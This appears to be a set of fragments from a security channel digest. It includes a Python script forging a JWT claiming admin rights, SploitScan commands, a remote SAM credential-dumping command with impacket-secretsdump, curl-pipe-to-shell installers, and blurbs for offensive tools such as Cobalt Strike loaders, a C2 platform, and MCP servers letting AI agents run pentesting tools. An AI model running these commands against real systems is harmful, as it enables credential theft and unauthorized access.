import json
import hmac
import hashlib
import base64
import uuid

header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())


def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
    jwt_parts = []
    json_header = json.dumps(header).encode()
    json_payload = json.dumps(payload).encode()
    jwt_parts.append(base64.urlsafe_b64encode(json_header))
    jwt_parts.append(base64.urlsafe_b64encode(json_payload))

    merge_payload_header = b'.'.join(jwt_parts)

    signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
    jwt_parts.append(base64.urlsafe_b64encode(signature))

    return b'.'.join(jwt_parts)

print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))

sudo apt install sploitscan

git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt

pip install --user sploitscan

➡️GitHub
➡️ExploitDB
➡️VulnCheck (нужен free API key)
➡️Packet Storm
➡️Nuclei

Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)

{
    "vulncheck_api_key": "",
    "openai_api_key": "",
    "google_api_key": "",
    "grok_api_key": "",
    "deepseek_api_key": ""
}

sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413

sploitscan -k "Outlook Express"

sploitscan --import-file path/to/yourfile.nessus --type nessus

sploitscan CVE-2024-1709 -e {json,csv,html}

sploitscan --ai openai CVE-2024-21413

┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...

python3 bhqc.py -h
python3 bhqc.py -p passwordNeo4JHere -d domain.local --heavy

install linux:
curl -LsSf https://astral.sh/uv/install.sh | sh
install windows:
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"

Техника удалённого извлечения локальных учётных данных Windows (SAM) через Shadow Snapshots, что позволяет получать доступ к необходимым веткам реестра (SAM, SYSTEM, SECURITY) через SMB, без запуска исполняемого кода на целевой машине.

impacket-secretsdump -use-remoteSSMethod “./Admin:1234@192.168.1.161”

Local-first AI-powered document intelligence platform for investigative journalism

Automated All-in-One OS Command Injection Exploitation Tool.
Usage examples

HexStrike AI MCP Agents is an advanced MCP server that lets AI agents (Claude, GPT, Copilot, etc.) autonomously run 150+ cybersecurity tools for automated pentesting, vulnerability discovery, bug bounty automation, and security research. Seamlessly bridge LLMs with real-world offensive security capabilities.
www.hexstrike.com/

AI-assisted penetration testing agent that enhances offensive security workflows by providing structured attack guidance, contextual analysis, and multi-backend AI integration.

ExecSentry is a professional-grade, rule-based security scanner designed to detect Arbitrary Binary Execution (ABE) vulnerabilities in: Web applications, Backend microservices, Local software components, CI/CD pipelines, Plugin-based systems, Script runners and scheduled tasks

Execute PE files in-memory using Cobalt Strike's Beacon, eliminating child processes and consoles for stealthy operations and efficient output handling.

Modern C2 Platform with Cloudflare Tunnel Integration | WinRM & SSH Remote Management | Real-time Terminal & Remote Desktop | Built with FastAPI & React

Connect Cursor, Copilot & Claude directly to Cheat Engine via MCP. Automate reverse engineering, pointer scanning, and memory analysis using natural language.